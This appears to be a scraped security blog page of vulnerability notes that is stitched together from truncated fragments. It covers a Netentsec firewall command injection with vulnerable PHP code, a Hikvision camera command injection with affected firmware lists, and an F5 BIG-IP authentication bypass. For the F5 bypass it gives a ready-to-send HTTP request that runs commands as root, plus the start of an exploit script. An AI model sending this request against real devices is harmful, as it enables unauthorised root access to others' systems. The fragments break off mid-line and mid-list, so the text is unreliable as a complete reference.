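Principle
In the Netentsec firewall's HearBeat.php file, setting the method parameter to delTestFile triggers a file deletion operation, with the files to delete specified in the data parameter. Because the deletion is carried out through a system command, this results in a command injection vulnerability.

    public function deleteImage($params){ // $params is passed in as a dictionary
        $basePath = '/var/www/html/';
        $imgPath = $this->imagePath;
        $params = $params->data; // get the file paths from data
        $cmd = "cd $imgPath \n /bin/rm -rf "; // main body of the command
        $existDefault=false;
        foreach ($params as $img){
            if($img=='default.png'){
                $existDefault=true;
            }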
Principle
Because the camera performs no further validation of the strings passed to it, malicious commands are injected into legitimate commands.
Reference article: https://kms.app/archives/399/

Affected versions
DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 Build 160530
DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401
DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125
DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414
DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421
DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928
DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build
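Principle
When HTTP Basic authentication and the X-F5-Auth-Token header are both set and the token value is empty, the program's identity verification is bypassed, and remote command execution is then possible through a specific endpoint.

Affected versions

Impact
Root privileges can be obtained, and commands can be executed as root.

POC & EXP
Manual

    POST /mgmt/tm/util/bash HTTP/1.1
    Host: 192.168.59.7
    Content-Type: application/json
    X-F5-Auth-Token:
    Authorization: Basic YWRtaW46
    Content-Length: 52

    { "command": "run", "utilCmdArgs": "-c id" }

Script

    import requests
    import json
    import sys
    requests.packages.urllib3.disable_warnings()
    proxies = {'http': 'http://localhost:7890', 'https': 'http://l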
Equinox
A network security practitioner who enjoys sharing